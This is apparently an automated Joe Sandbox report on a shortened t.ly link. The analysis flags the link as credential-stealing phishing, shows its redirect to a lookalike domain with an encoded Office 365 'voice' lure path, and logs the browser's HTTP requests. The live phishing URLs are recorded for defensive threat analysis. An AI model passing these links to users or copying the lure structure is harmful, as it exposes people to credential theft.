Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://t.ly/X0-7Q

Overview

General Information

Sample URL:https://t.ly/X0-7Q
Analysis ID:1554542
Infos:

Detection

Score:48
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected suspicious crossdomain redirect

Classification

  • System is w10x64
  • chrome.exe (PID: 2260 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 5428 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2100 --field-trial-handle=1948,i,14795089436548518358,10330703935156435624,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6392 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://t.ly/X0-7Q" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://t.ly/X0-7QSlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social Engineering
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49750 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49755 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49763 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49864 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49866 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49867 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49865 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49868 version: TLS 1.2
Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: t.ly to https://gardenfresheg.com.americanfoodeg.com/m/?c3y9bzm2nv8xx3zvawnljnjhbmq9u0dsa1dtwt0mdwlkpvvtrviwnjexmjaynfuxmtexmdywoq
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /X0-7Q HTTP/1.1Host: t.lyConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /m/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9U0dsa1dtWT0mdWlkPVVTRVIwNjExMjAyNFUxMTExMDYwOQ HTTP/1.1Host: gardenfresheg.com.americanfoodeg.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/02/Garden-fresh-logo.jpg HTTP/1.1Host: gardenfresheg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://gardenfresheg.com.americanfoodeg.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/advanced-product-search-for-woo/assets/images/loader.gif HTTP/1.1Host: gardenfresheg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://gardenfresheg.com.americanfoodeg.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/02/Garden-fresh-logo.jpg HTTP/1.1Host: www.gardenfresheg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://gardenfresheg.com.americanfoodeg.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/advanced-product-search-for-woo/assets/images/loader.gif HTTP/1.1Host: www.gardenfresheg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://gardenfresheg.com.americanfoodeg.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/02/Garden-fresh-logo-100x100.jpg HTTP/1.1Host: gardenfresheg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://gardenfresheg.com.americanfoodeg.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/02/Garden-fresh-logo-100x100.jpg HTTP/1.1Host: www.gardenfresheg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://gardenfresheg.com.americanfoodeg.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=1731426071|w2lIPHb04GLH
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/02/Garden-fresh-logo.jpg HTTP/1.1Host: gardenfresheg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://gardenfresheg.com.americanfoodeg.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/02/Garden-fresh-logo.jpg HTTP/1.1Host: www.gardenfresheg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://gardenfresheg.com.americanfoodeg.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=1731426071|w2lIPHb04GLH
Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
